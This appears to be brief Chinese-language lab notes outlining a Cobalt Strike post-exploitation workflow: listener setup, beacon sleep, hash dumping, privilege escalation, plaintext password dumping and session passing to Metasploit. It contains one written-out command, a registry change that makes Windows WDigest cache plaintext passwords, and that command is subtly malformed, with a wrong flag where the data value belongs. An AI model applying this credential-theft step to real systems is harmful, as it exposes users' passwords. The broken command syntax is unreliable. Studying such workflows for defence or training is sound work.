cs
运行cs服务端
运行客户端,连接成功
配置监听器
配置攻击模块,会话交互
回话操作设置回连间隔时间
查看当前用户
抓取哈希
提权
抓取明文密码,发现为null
抓取明文密码
默认的缓存表中是不存在明文密码,需要通过修改注册表来让Wdigest Auth保存明文口令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f 1 /f
msf
权限传递
建立监听窗口
这里就完成了